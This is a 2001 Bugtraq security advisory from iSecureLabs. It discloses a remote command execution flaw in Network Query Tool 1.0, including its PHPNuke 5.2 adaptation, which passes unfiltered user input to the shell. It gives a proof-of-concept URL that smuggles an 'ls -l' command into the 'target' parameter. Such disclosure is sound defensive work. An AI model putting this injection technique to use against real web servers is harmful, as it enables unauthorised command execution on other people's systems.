[22942] in bugtraq
[Advisory iSecureLabs] Network Query Tool remote command execution
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Cabezon_Aur=E9lien?)
Mon Oct 22 11:25:20 2001
Message-ID: <06ad01c15a8e$b204f610$a423fcc1@London>
From: =?iso-8859-1?Q?Cabezon_Aur=E9lien?= <aurelien.cabezon@isecurelabs.com>
To: "Bugtraq@Securityfocus.Com" <bugtraq@securityfocus.com>
Cc: "Vulnwatch@Vulnwatch. Org" <vulnwatch@vulnwatch.org>,
"SecurITeam News" <news@securiteam.com>, <security@isecurelabs.com>
Date: Mon, 22 Oct 2001 02:15:43 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
--[ Network Query Tool 1.0 and Network Query Tool 1.0 Adapted for PHPNuke
5.2 remote command execution ]--
Problem discovered: 22/10/2001 by Cabezon Aurélien |
aurelien.cabezon@iSecureLabs.com |
http://www.isecurelabs.com/article.php?sid=147
--[ Description ]--
Network Query Tool 1.0 Adapted for PHPNuke 5.2 is a PHP script thtat allow
user to:
- Resolve/Reverse Lookup
- Get DNS Records
- Whois (Web)
- Whois (IP owner)
- Check port
- Ping host
- Traceroute to host
Network Query tool does not check for special meta-characters like
&;`'\"|*?~<>^()[]{}$\n\r. This allow any user to execute
UNIX commands on web server.
--[ Exploit ]--
Execute ls -al command.
http://www.TEST.com/network_query.php?portNum=80&queryType=all&target=www.so
meserver.com%3Bls+-l&Submit=Do+It
--[ Fix ]--
Coders have been alerted
--[ Informations about Network Query Tool ]--
Network Query Tool 1.0 http://www.shat.net/php/nqt/
Network Query Tool 1.0 Adapted for PHPNuke 5.2 http://http://www.yacapa.com
---
Cabezon Aurélien
http://www.iSecureLabs.com
aurelien.cabezon@iSecureLabs.com
